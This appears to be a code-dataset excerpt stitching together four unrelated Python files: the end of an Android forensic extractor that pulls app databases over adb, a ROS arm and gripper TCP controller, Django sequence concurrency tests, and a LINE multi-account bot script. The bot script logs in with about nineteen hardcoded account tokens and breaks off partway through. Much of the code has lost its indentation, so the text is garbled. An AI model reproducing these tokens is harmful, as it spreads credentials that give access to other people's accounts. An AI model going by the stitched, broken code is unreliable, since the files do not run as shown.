        self.output_dir = os.path.join(self.work_dir, self.extract_dir)  # work_dir already includes base_dir
self.logger.debug(f'work_dir:{self.work_dir}')
self.logger.debug(f'output_dir:{self.output_dir}')
self.setup()
def download_file(self, file_path):
"""
Return values:
True = file downloaded
False = file does not exist, or failed to get in full size
None = file exists but has no size
"""
file_remote = self.adb.exists(file_path, su=self.su)
if file_remote:
file_name = os.path.basename(file_remote)
file_local = os.path.join(self.output_dir, file_name)
remote_size = self.adb.get_size(file_path, su=self.su)
file_saveas = os.path.join(
os.path.split(file_local)[0],
os.path.split(file_remote)[1])
if remote_size == 0:
return None
self.logger.info(f'{file_remote} ({remote_size} bytes)')
if self.permisson == self.ROOT:
self.adb.pull_file(file_path, file_local)
if os.path.exists(file_local):
self.DataStore.add(file_saveas, file_remote)
self.DOWNLOADS.append(file_name)
return True
            elif self.permisson == self.ROOTSU:
                for _ in range(100):
                    file_obj = self.adb.get_file(file_path, su=self.su)
                    if file_obj and len(file_obj) == remote_size:
                        with open(file_saveas, 'wb') as W:
                            W.write(file_obj)
                        self.DataStore.add(file_saveas, file_remote)
                        self.DOWNLOADS.append(file_name)
                        return True
                    time.sleep(0.25)
                    # file_obj can be None/empty on a failed pull, so guard the len()
                    self.logger.debug(f'Trying again for {file_name} ({len(file_obj or b"")} bytes)')
                else:
                    self.logger.warning(f'Failed getting file: {file_name}')
                    return False
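    # Caller sketch (hypothetical) for the tri-state return documented above:
    #   ok = chain.download_file('/data/data/com.example/databases/msg.db')
    #   if ok:            file pulled and archived in the DataStore
    #   elif ok is None:  file exists on the device but is zero bytes
    #   else:             file missing, or a full-size pull never succeeded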
def do_backup(self, ALL=True, shared=False, backup_name='backup.ab'):
backup_file = os.path.join(self.work_dir, backup_name)
cmd = [
'backup',
'-shared' if shared else '',
'-all' if ALL else '',
'-f',
backup_file,
]
com = threading.Thread(target=lambda: self.adb(cmd))
com.start()
if self.updater:
messages.msg_do_backup()
while com.is_alive():
time.sleep(0.5)
if os.path.exists(backup_file):
_size = os.path.getsize(backup_file)
self.update(f'Reading backup: {utils.human_bytes(_size)}', info=False)
self.backup = backup_file
def AndroidBackupToTar(self):
self.update('Unpacking backup...')
self.tarfile = self.tools.ab_to_tar(self.backup)
    def ExtractFromTar(self, targets=None):
        self.update('Extracting from backup...')
        # targets defaults to None to avoid a mutable default argument
        for fn in self.tools.extract_form_tar(
                self.tarfile,
                self.output_dir,
                targets=targets or []):
self.DataStore.add(os.path.join(self.output_dir, fn), fn)
self.DOWNLOADS.append(fn)
def get_targets(self):
self.targets = [*map(pathlib.PurePath, self.registry.get_posix_links)]
def in_targets(self, target):
if not self.targets:
self.get_targets()
target = pathlib.PureWindowsPath(target).as_posix()
for f in self.targets:
if f.match(target):
return True
return False
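    # `self.targets` holds the registry's posix links as PurePaths; PurePath.match()
    # is then called with the candidate path as the glob pattern, which matches from
    # the right -- e.g. PurePath('apps/com.x/db/msg.db').match('msg.db') is True.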
@staticmethod
def extract_form_dir(src_dir):
src_dir_path = pathlib.Path(src_dir)
for fobj in src_dir_path.rglob('**/*'):
if fobj.is_file():
yield fobj
def ExtractFromDir(self):
self.update('Extracting from directory...')
src_dir_path = pathlib.Path(self.src_dir)
for fobj in self.extract_form_dir(self.src_dir):
fn = fobj.relative_to(src_dir_path)
if self.in_targets(fn.name):
self.logger.info(fn.name)
shutil.copy2(fobj, os.path.join(self.output_dir, fn.name))
self.DOWNLOADS.append(os.path.basename(fn))
    def enumerate_files(self, target_dir='/'):
        FILES = []
        for f in self.adb_iter(f'find {target_dir} -type f -readable'):
            FILES.append(f)
        return FILES  # the list was built but never returned in the original
def DataAcquisition(self, run_backup=False, shared=False):
self.update('Acquiring data...')
if not run_backup and self.ROOT in self.permisson:
if shared:
self.update('Acquiring shared storage...')
self.do_backup(ALL=False, shared=True, backup_name='shared.ab')
self.update('Acquiring databases via root...')
for file_path in self.registry.get_root_links:
self.download_file(file_path)
elif run_backup or self.permisson == self.USER:
self.do_backup(shared=shared)
if self.backup and os.path.getsize(self.backup) <= 2 ** 10:
self.logger.error('Android backup failed - too small.')
self.backup = False
def DataExtraction(self):
self.update('Extracting data from source...')
if self.backup:
self.AndroidBackupToTar()
if self.tarfile:
targets = self.registry.get_all_links
# Perhaps change to posix links?
self.ExtractFromTar(targets=targets)
# if self.DataStore and self.DataStore.members:
# pass # TODO!
def DecodeShared(self):
try:
            if self.backup:  # the original "backup or (do_shared and backup)" reduces to this
self.update('Decoding shared filesystem...')
deco = decoders.SharedFilesystemDecoder(self.work_dir, self.backup)
self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
except Exception as err:
logger.exception(f'Shared decoder error: {err}')
def DataDecoding(self):
self.update('Decoding extracted data...')
self.logger.debug(self.DOWNLOADS)
workbook = self.get_master_workbook()
for file_name in filter(None.__ne__, self.DOWNLOADS):
if self.registry.has_target(file_name):
for deco_class in self.registry.decoders_target(file_name):
file_path = os.path.join(self.output_dir, file_name)
try:
self.logger.info(f'Decoding {file_name} using {deco_class.__name__}')
deco = deco_class(self.work_dir, file_path)
if not deco.template_name:
continue
self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
deco.report_xlsx(workbook=workbook)
except Exception as e:
logger.error(f'Decoding error for `{os.path.basename(file_name)}`: {e}')
logger.exception(str(e))
def GenerateHtmlReport(self, open_html=True):
self.update('Generating HTML report...')
env = engines.get_engine()
template_name = 'REPORT.html'
template = env.get_template(template_name)
report_file = os.path.join(self.work_dir, template_name)
with open(report_file, 'w') as W:
W.write(template.render(
report=self.REPORT.items(),
decoded=self.DECODED,
**engines.get_head_foot()))
if open_html:
report_uri = pathlib.Path(report_file).as_uri()
webbrowser.open_new_tab(report_uri)
def get_master_workbook(self):
self.WB = engines.Workbook(self.work_dir, 'REPORT')
self.summary_sheet = self.WB.add_sheet('Summary')
self.WB.write_header(self.summary_sheet, ['Extraction Summary'])
return self.WB
def GenerateXlsxReport(self):
self.update('Generating XLSX report...')
for row, summary in enumerate(self.DECODED, start=1):
self.summary_sheet.write_row(row, 0, summary[1:])
self.WB.close()
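# Typical drive sequence (a sketch inferred from the methods above, not a
# documented API): an ADB run would call InitialAdbRead() first so that
# CreateWorkDir() can name the folder after the device's manufacturer/model, then:
#   chain.DataAcquisition() -> chain.DataExtraction() -> chain.DataDecoding()
#   chain.DecodeShared() -> chain.GenerateHtmlReport() -> chain.GenerateXlsxReport()
#   chain.CleanUp()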
# -----------------------------------------------------------------------------
class DecodingError(Exception):
pass
|
stx_controller_TCP_client.py
|
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import rospy
import math
import actionlib
import signal
import json
import os
from std_msgs.msg import Empty
from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from sensor_msgs.msg import JointState
from stx_control.srv import stx_manager_service, stx_manager_serviceResponse
from stxlib.tcp_move.basic_client import BasicClient
from msg_state import MsgState
MC_IP = '90.0.0.1'
ROBOT_SPEED = 15
TCP_IP = MC_IP
TCP_PORT = 6001
MOVEMENT_TIMEOUT = 60
GRIPPER_TIMEOUT = 3
CLEAN_TABLE_TIMEOUT = 40
D_TIME_OUT = 20
I_TIME_OUT = 2
motion_status = threading.Event()
my_mutex = threading.Lock()
# ----------------------------------------------------Arm---------------------------------------------------------------
class StxControllerServerArm:
def __init__(self):
self.server = actionlib.SimpleActionServer('/arm_controller/follow_joint_trajectory',
FollowJointTrajectoryAction,
self.execute,
False)
self.server.start()
self.planing_request_publisher = rospy.Publisher('/rviz/moveit/update_goal_state',
Empty,
queue_size=20)
def execute(self, goal):
"""
:type goal: FollowJointTrajectoryGoal
"""
try:
# get the msg counter from MC
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.enableGroup(65)
rospy.loginfo('ACTION GOAL - arm_controller_tcp INVOKED!')
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.logerr('TOOK TOO LONG FOR MC TO RESPOND')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
else:
motion_status.clear()
arm_msg_id = send_trajectory_to_server(goal.trajectory, self.server)
# waiting for 60 seconds to finish moving the arm
if not motion_status.wait(timeout=MOVEMENT_TIMEOUT):
rospy.logerr('TOOK TOO LONG TO EXECUTE MOVEMENT - EXECUTION ABORTED ')
self.server.set_aborted()
                    my_mutex.acquire()
                    obj = msg_state_dictionary[str(arm_msg_id)]
                    obj.dead = True
                    my_mutex.release()
else:
motion_status.clear()
self.planing_request_publisher.publish()
except Exception as e:
print("Exiting: SimpleActionServer...")
def send_trajectory_to_server(goal_trajectory, srv):
"""
:type goal_trajectory: JointTrajectory
"""
    points = goal_trajectory.points  # type: list[JointTrajectoryPoint]
    last_point = points[-1].positions
    print(last_point)
    last_point_deg = list(map(math.degrees, last_point))
# get the msg counter from MC
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, srv.set_succeeded, srv.set_aborted, False)
# print("just inserted msg number: {}".format(msg_id))
# TO EDIT THE MOVING SPEED OF THE ROBOT CHANGE THE LAST PARAMETER FROM 10 TO DESIRED SPEED
tn.grJoints(65, last_point_deg[0], last_point_deg[1], last_point_deg[2], last_point_deg[3], last_point_deg[4],
ROBOT_SPEED)
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.logerr('TOOK TOO LONG FOR MC TO RESPOND')
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
        srv.set_aborted()
    motion_status.clear()
return msg_id
# ----------------------------------------------------Gripper-----------------------------------------------------------
class StxControllerServerGripper:
def __init__(self):
self.server = actionlib.SimpleActionServer('/gripper_controller/follow_joint_trajectory',
FollowJointTrajectoryAction,
self.execute,
False)
self.server.start()
self.msg_gripper = init_gripper_msg()
self.pub = rospy.Publisher('joint_states', JointState, queue_size=10)
t_gripper_publisher = threading.Thread(target=self.publish_to_joint_state)
t_gripper_publisher.start()
def publish_to_joint_state(self):
try:
rate = rospy.Rate(50) # 50hz/20ms
while not rospy.is_shutdown():
self.msg_gripper.header.stamp = rospy.Time.now()
self.pub.publish(self.msg_gripper)
rate.sleep()
except Exception as e:
print("EXITING: publisher thread...")
def execute(self, goal):
"""
:type goal: FollowJointTrajectoryGoal
"""
try:
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.enableGroup(65)
rospy.loginfo('ACTION GOAL - gripper_controller_tcp INVOKED!')
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.logerr('TOOK TOO LONG FOR MC TO RESPOND')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
else:
motion_status.clear()
msg_gripper, msg_gripper_id = send_gripper_action_to_server(self, goal.trajectory)
# waiting for GRIPPER_TIMEOUT seconds to finish moving the Gripper
if not motion_status.wait(timeout=GRIPPER_TIMEOUT):
rospy.logerr('TOOK TOO LONG TO EXECUTE GRIPPER ACTION - EXECUTION ABORTED ')
self.server.set_aborted()
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_gripper_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
return
motion_status.clear()
self.msg_gripper = msg_gripper
rospy.loginfo("GRIPPER ACTION IS DONE! ")
except Exception as e:
print("Exiting: SimpleActionServer...")
def send_gripper_action_to_server(gripper, goal_trajectory):
"""
:type goal_trajectory: JointTrajectory
"""
points = goal_trajectory.points # type: list[JointTrajectoryPoint]
    gripper_state = points[-1].positions[0] + points[-1].positions[1]
# print(points[points.__len__() - 1].positions)
if gripper_state > 0.05:
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, gripper.server.set_succeeded, gripper.server.set_aborted, True)
tn.gripperClose()
rospy.loginfo("Gripper is closing")
else:
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, gripper.server.set_succeeded, gripper.server.set_aborted, True)
tn.gripperOpen()
rospy.loginfo("Gripper is: opening")
# construct the msg to 'Joint State' topic
joint_names = rospy.get_param('/gripper_controller_joint_names')
# joint_names = ['gripper_left_joint', 'gripper_right_joint']
    msg_gripper = JointState()
    msg_gripper.name = joint_names
    msg_gripper.header.stamp = rospy.Time.now()
    msg_gripper.position = points[-1].positions
    msg_gripper.velocity = [1.0, 1.0]
    msg_gripper.effort = [1.0, 1.0]
return msg_gripper, msg_id
def init_gripper_msg():
try:
msg_gripper = JointState()
msg_gripper.name = ['gripper_left_joint', 'gripper_right_joint']
msg_gripper.position = [0.0, 0.0]
msg_gripper.velocity = [1.0, 1.0]
msg_gripper.effort = [1.0, 1.0]
msg_gripper.header.stamp = rospy.Time.now()
return msg_gripper
except Exception as e:
print("Exiting: main thread - exception...")
# ---------------------------------------Helpers------------------------------------------------------------------
def handle_service_command(req):
if req.command == '1':
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.enableGroup(65)
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.loginfo('TOOK TOO LONG FOR MC TO RESPOND ')
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
return stx_manager_serviceResponse(
'Operating the robot has NOT been Enabled - MC has not responded in reasonable time')
motion_status.clear()
return stx_manager_serviceResponse("Operating the robot from 'moveit_node' has been Enabled")
if req.command == '0':
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.disableGroup(65)
if not motion_status.wait(timeout=I_TIME_OUT):
rospy.loginfo('TOOK TOO LONG FOR MC TO RESPOND ')
my_mutex.acquire()
obj = msg_state_dictionary[str(msg_id)]
obj.dead = True
my_mutex.release()
motion_status.clear()
return stx_manager_serviceResponse(
' Operating the robot has NOT been Disabled - MC has not responded in reasonable time')
motion_status.clear()
return stx_manager_serviceResponse(" Operating the robot from 'moveit_node' has been Disabled")
else:
return stx_manager_serviceResponse('Error: wrong input')
def signal_handler(signal, frame):
msg_id = tn.getMsgCounter()
create_and_put_in_dictionary(msg_id, None, None, True)
tn.disableGroup(65)
tn.disconnect()
    # let all other threads exit before the main thread
rospy.sleep(1)
print("Exiting: main thread - signal handler...")
return
def create_and_put_in_dictionary(key, success_func, abort_func, is_immediate):
my_msg = MsgState(key, success_func, abort_func, is_immediate)
my_mutex.acquire()
msg_state_dictionary[str(key)] = my_msg
my_mutex.release()
def start_listening_thread():
try:
while 1:
# if no action from MC for CLEAN_TABLE_TIMEOUT seconds-> clean the msg dictionary
signal.alarm(CLEAN_TABLE_TIMEOUT)
ans = tn.recv()
update_msg_state(ans)
except Exception as e:
print("EXITING: listener thread...")
def update_msg_state(msg):
immediate_ack_time = int(round(time.time() * 1000))
is_differed = False
parsed_ans = msg.split(" ")
msg_id = parsed_ans[0]
if msg_id[0] == '!':
is_differed = True
msg_id = msg_id[1:]
# if a msg from mc is 'Fault' event
if msg_id[0] == '#':
rospy.loginfo(msg)
msg_err_code = parsed_ans[1].split("\r\n")[0]
my_object = msg_state_dictionary[msg_id]
my_object.is_differed = is_differed
my_object.err_code = msg_err_code
if my_object.dead:
return
if not is_differed:
my_object.immediate_ack_time = immediate_ack_time
motion_status.set()
if my_object.is_immediate and my_object.success_callback is not None:
my_object.success_callback()
if msg_err_code != '0':
for error in error_dict:
if error["number"] == msg_err_code:
rospy.logerr(error["message"])
rospy.loginfo("EXIT SYSTEM - use 'Ctl+C'")
# if differed we call the Success/Fail callback
else:
if msg_err_code == '0':
rospy.loginfo("SET SUCCESS CALLBACK IS CALLED!")
my_object.success_callback()
motion_status.set()
else:
for error in error_dict:
if error["number"] == msg_err_code:
rospy.logerr(error["message"])
rospy.loginfo("EXIT SYSTEM - use 'Ctl+C'")
rospy.loginfo("SET FAIL CALLBACK IS CALLED!")
my_object.fail_callback()
motion_status.set()
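# Ack format assumed by the parser above: "<id> <err>\r\n" for an immediate ack,
# "!<id> <err>\r\n" for a deferred completion, and a leading "#" for an unsolicited
# fault event. e.g. "!42 0\r\n" completes message 42 successfully and fires its
# success callback.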
def clean_dictionary(signum, frame):
"""called when read times out"""
keys = []
rospy.loginfo("Cleaning dictionary!!!")
for key in msg_state_dictionary:
msg = msg_state_dictionary[key]
if msg.dead:
keys.append(key)
else:
if msg.is_immediate or msg.is_differed:
keys.append(key)
else:
time_from_ack = int(round(time.time() * 1000)) - msg.immediate_ack_time
time_from_creation = int(round(time.time() * 1000)) - msg.creation_time
if time_from_ack > D_TIME_OUT or time_from_creation > I_TIME_OUT:
keys.append(key)
keys_no_duplicates = list(dict.fromkeys(keys))
my_mutex.acquire()
for key in keys_no_duplicates:
del msg_state_dictionary[key]
my_mutex.release()
rospy.loginfo("Dictionary is clean!!!")
if __name__ == '__main__':
try:
signal.signal(signal.SIGALRM, clean_dictionary)
signal.signal(signal.SIGINT, signal_handler)
rospy.init_node('arm_controller')
rospy.loginfo('stx_controller_arm/gripper_Running_tcp.............')
print("=====================================")
MC_IP = rospy.get_param('~MC-IP')
        print('Stx controller uses IP: {}'.format(MC_IP))
        ROBOT_SPEED = rospy.get_param('~ROBOT-SPEED')
        print('Robot SPEED is: {}'.format(ROBOT_SPEED))
print("=====================================")
tn = BasicClient(MC_IP)
tn.connect()
# create a hash map: key(MC msg id) value(msg state object)
msg_state_dictionary = dict()
# create an error dictionary from json
mypath = os.path.join(os.path.dirname(__file__), 'stxlib/error_codes.json')
with open(mypath, 'r') as errors:
error_dict = json.load(errors)
t_MC_response = threading.Thread(target=start_listening_thread)
t_MC_response.start()
server_arm = StxControllerServerArm()
server_gripper = StxControllerServerGripper()
service = rospy.Service('Stx_manage_client_command', stx_manager_service, handle_service_command)
rospy.spin()
tn.disconnect()
except rospy.ROSInterruptException:
pass
except Exception as e:
print("Exiting: main thread - exception...")
|
tests.py
|
import threading
import time
from django.db import OperationalError, connection, transaction
from django.test import TestCase, TransactionTestCase
from . import get_next_value
class SingleConnectionTestsMixin(object):
def test_defaults(self):
self.assertEqual(get_next_value(), 1)
self.assertEqual(get_next_value(), 2)
self.assertEqual(get_next_value(), 3)
def test_sequence_name(self):
self.assertEqual(get_next_value('cases'), 1)
self.assertEqual(get_next_value('cases'), 2)
self.assertEqual(get_next_value('invoices'), 1)
self.assertEqual(get_next_value('invoices'), 2)
def test_initial_value(self):
self.assertEqual(get_next_value('customers', initial_value=1000), 1000)
self.assertEqual(get_next_value('customers', initial_value=1000), 1001)
self.assertEqual(get_next_value('customers'), 1002)
class SingleConnectionInAutocommitTests(SingleConnectionTestsMixin,
TransactionTestCase):
pass
class SingleConnectionInTransactionTests(SingleConnectionTestsMixin,
TestCase):
pass
class ConcurrencyTests(TransactionTestCase):
def assertSequence(self, one, two, expected):
actual = []
thread_one = threading.Thread(target=one, args=(actual,))
thread_two = threading.Thread(target=two, args=(actual,))
thread_one.start()
thread_two.start()
thread_one.join(timeout=1)
thread_two.join(timeout=1)
self.assertEqual(actual, expected)
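    # Interleaving harness: thread one sleeps while holding its transaction open
    # and thread two starts 0.1 s later, so the order in which ('name', value)
    # pairs land in `actual` shows whether get_next_value() blocked on the row lock.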
def test_first_access_with_commit(self):
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 1),
('two', 'begin'),
('one', 'commit'),
('two', 2),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_later_access_with_commit(self):
get_next_value()
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 2),
('two', 'begin'),
('one', 'commit'),
('two', 3),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_first_access_with_rollback(self):
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
transaction.set_rollback(True)
output.append(('one', 'rollback'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 1),
('two', 'begin'),
('one', 'rollback'),
('two', 1),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_later_access_with_rollback(self):
get_next_value()
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value()
output.append(('one', value))
time.sleep(0.2)
transaction.set_rollback(True)
output.append(('one', 'rollback'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value()
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 2),
('two', 'begin'),
('one', 'rollback'),
('two', 2),
('two', 'commit'),
]
self.assertSequence(one, two, expected)
def test_first_access_nowait(self):
def one(output):
with transaction.atomic():
value = get_next_value()
output.append(('one', value))
time.sleep(0.5)
connection.close()
# One might expect an OperationalError here, but PostgreSQL doesn't
# appear to report an error in this case.
def two(output):
time.sleep(0.1)
with transaction.atomic():
value = get_next_value(nowait=True)
output.append(('two', value))
connection.close()
expected = [
('one', 1),
('two', 2),
]
self.assertSequence(one, two, expected)
def test_later_access_nowait(self):
get_next_value()
def one(output):
with transaction.atomic():
value = get_next_value()
output.append(('one', value))
time.sleep(0.5)
connection.close()
def two(output):
time.sleep(0.1)
with self.assertRaises(OperationalError):
with transaction.atomic():
value = get_next_value(nowait=True)
output.append(('two', value)) # shouldn't be reached
output.append(('two', 'exc'))
connection.close()
expected = [
('one', 2),
('two', 'exc'),
]
self.assertSequence(one, two, expected)
def test_first_access_to_different_sequences(self):
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value('one')
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value('two')
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 1),
('two', 'begin'),
('two', 1),
('two', 'commit'),
('one', 'commit'),
]
self.assertSequence(one, two, expected)
def test_later_access_to_different_sequences(self):
get_next_value('one')
get_next_value('two')
def one(output):
with transaction.atomic():
output.append(('one', 'begin'))
value = get_next_value('one')
output.append(('one', value))
time.sleep(0.2)
output.append(('one', 'commit'))
connection.close()
def two(output):
time.sleep(0.1)
with transaction.atomic():
output.append(('two', 'begin'))
value = get_next_value('two')
output.append(('two', value))
output.append(('two', 'commit'))
connection.close()
expected = [
('one', 'begin'),
('one', 2),
('two', 'begin'),
('two', 2),
('two', 'commit'),
('one', 'commit'),
]
self.assertSequence(one, two, expected)
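# Semantics these tests pin down (a summary, not an API contract): get_next_value()
# locks the sequence row until the surrounding transaction ends, a rollback releases
# the value for reuse, nowait=True raises OperationalError instead of blocking, and
# independently named sequences never contend with each other.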
|
yudi25.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="EnvQXVzt3IgL2QvxUgz8.pIfscrd8L4dj1jrbrT2fca.lJOK5Qp8g5KnPMCGvZnKxlyBqwaWvtTjiWQiHJoch54=")#1
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token="EnJHnzZtcLZy08jUudr8.6aZTpsG37MxD+MqNsJxP6a.pZsWL5U6ieTsZrFJuMXnf7QpspabSy9KaU1zGy6VO6I=")#2
ki.loginResult()
kk = LINETCR.LINE()
#kk.login(qr=True)
kk.login(token="EnAj23Jh8RuJPIj8gSR2.AZs3a8Vf+ipnhLTOmQbtuG.IMP3CkWJzbWurJzxISj1C93pJEV6ekIPia+yceUIGDY=")#3
kk.loginResult()
kc = LINETCR.LINE()
#kc.login(qr=True)
kc.login(token="EnJ6mjXHY2IGs6R9n1Hf.TxpN+3FqpfVz0URVVjPPxW.zUTh0PiZgXO1pQY7kHa5tn8g8AHT5ivC1FqRLTsiIGc=")#4
kc.loginResult()
ks = LINETCR.LINE()
#ks.login(qr=True)
ks.login(token="En6QESR7hoEmT4F3A2m4.DPUJL7N9FlH3q14qZJ5r5a.SwCLojcGrkvRGB2rzgPJH+k0P5UD2C+PLy3yzCRF51I=")#5
ks.loginResult()
k1 = LINETCR.LINE()
#k1.login(qr=True)
k1.login(token="EnlG4y1876rJ6k4O0WL4.+Bc/Zlua/rxta3RDE9Qfra.GhjAQy9dGlOPyMu05Y9wgNRDI7UHt1VnAiVViGHAnlY=")#6
k1.loginResult()
k2 = LINETCR.LINE()
#k2.login(qr=True)
k2.login(token="EnYglmuDtOrrZzCz5MO8.0LFAw+X66CVCLF7PSB30Qa.DFXqp/uBBHSQcIdpf+7vfq0VJXWCuqqfh72ZNnvYMlA=")#7
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="EntaZG1XY2EgVxbuAaW1.hm/n508o500AIsyh+lXvmq.USXhhYC0Dnh9OwOHUaI6QC1Lh4ZoAyQcHqBblMyLSao=")#8
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="EninnKrHFUpBOMgFrCk8.5Gss6Cj7IBEXrUFBawm9oa.U7zxbe6DD9P52hXLGWwjloGINuKlQWHpUtgSsDB063g=")#9
k4.loginResult()
k5 = LINETCR.LINE() #
#k5.login(qr=True)
k5.login(token="EnDBX2qdv1CbyWyEdyu1.F998qotUGTGQIRjcj/3fKq.XNkXIlffqqlmRBkRmQdvcDUXRiO0GAo/+A65lF/HHO0=")#10
k5.loginResult()
k6 = LINETCR.LINE()
#k6.login(qr=True)
k6.login(token="EnJKHSdZ0pIVQ9vpYAQ3.SO/fObQ10CshHFFY0L3meW.UQV56fkXVTk1uRO0pSsbGDJDA8TUy12Vzmj0ThBRowk=")#1
k6.loginResult()
k7 = LINETCR.LINE()
#k7.login(qr=True)
k7.login(token="Enw3Vyivaalra403LERd.rOli1dtiBis50MI658yqRq.CAnS9i55O0J7/qLZf/LIS8yd+i1KSh2PH1tQcSOy8Oo=")#2
k7.loginResult()
k8 = LINETCR.LINE()
#k8.login(qr=True)
k8.login(token="EnCifPd5Tc5F3u7mO0i0.JAwaMojSWCnrhb405Gw7Sa.QwIMdNcSvc7UuHJ93FL3Kn2neKfmEC3eNN6gG+FxPE8=")#3
k8.loginResult()
k9 = LINETCR.LINE()
#k9.login(qr=True)
k9.login(token="EndK1JKkdpl9wB4gdbm2.kJj6gKL1avGlp7iF9MY8KG.j2RsigIr9LP7KfOeJLgjSA1R9u40UwdzjsuP0KV36pk=")#4
k9.loginResult()
k10 = LINETCR.LINE()
#k10.login(qr=True)
k10.login(token="En9TOIUfE2WyoXCD7l74.hz3BUHBhWs9y9M66OUsVXa.FQoVihfIMAP3no25MwO2PT2uRbmzkuYxymaFCShtoPo=")#5
k10.loginResult()
k11 = LINETCR.LINE()
#k11.login(qr=True)
k11.login(token="EnTzqSIB5hpjSjaUXzp6.zbzLgObFSJIgQgJQvcBBPG.44vY/TL5s+Bypu87rQuExKc+8yR59AOcV0H4OL92bCI=")#6
k11.loginResult()
k12 = LINETCR.LINE()
#k12.login(qr=True)
k12.login(token="EncFq0IWEPEwmOWUObK4.4tpKgyQpvX03tq+Nc2O81a.s675l1+/7PZ2hznoDuH4FWmjYE4rvWiAAp4qelq9IP0=")#7
k12.loginResult()
k13 = LINETCR.LINE()
#k13.login(qr=True)
k13.login(token="En6cLAnzmzMLxf8Tn8s5.I5/VTy4nlTo0SUVhFfe6Xq.IV5c4LHKA6bR4k1ziZKaxf+c7hwG1Pt7jPByl5UXRtA=")#8
k13.loginResult()
k14 = LINETCR.LINE()
#k14.login(qr=True)
k14.login(token="EnKKOa3cbKeriUPg4jK8.gyJ7IyLouRfMg9Euqk50Ma.yiGw+8VE6ShqL2u5aca3ggjfdxnAxnniBFztlqbi2Lg=")#1.5b
k14.loginResult()
k15 = LINETCR.LINE()
#k15.login(qr=True)
k15.login(token="EnmCVqYbfGO5u0LGIGaf.xJUtYDt++RBi3klp87+xlW.7z6zZWPf9TK93MVvKHs2UbhP6zJGBB6BmjMraqmOIE8=")#gondrong
k15.loginResult()
k16 = LINETCR.LINE()
#k16.login(qr=True)
k16.login(token="EnnFGK6AknxF1NDDwMJ5.WVIB6Th9FuqOpB9Iw2XUbq.DSooi371J9gM1ZH+q0DHPzsxfIEEszoz8jUXF2IFZVA=")
k16.loginResult()
k17 = LINETCR.LINE()
#k17.login(qr=True)
k17.login(token="En9wjOwk4ToKaOjF5I87.8DHCNR+5ggo//QiQT7pj9W.FpXmtdVYvp/060ecr0WUr+FGOnRHwy7lbbdBfusxg7g=")
k17.loginResult()
k18 = LINETCR.LINE()
#k18.login(qr=True)
k18.login(token="En3FJnEXtlHEqSKeZf74.eKVQczIDnmzo80Nf0AhV1a.GAVz8CghCWtpTlGJXU5rgRYkEVaust9sS0Klv/1E6d0=")
k18.loginResult()
k19 = LINETCR.LINE()
#k19.login(qr=True)
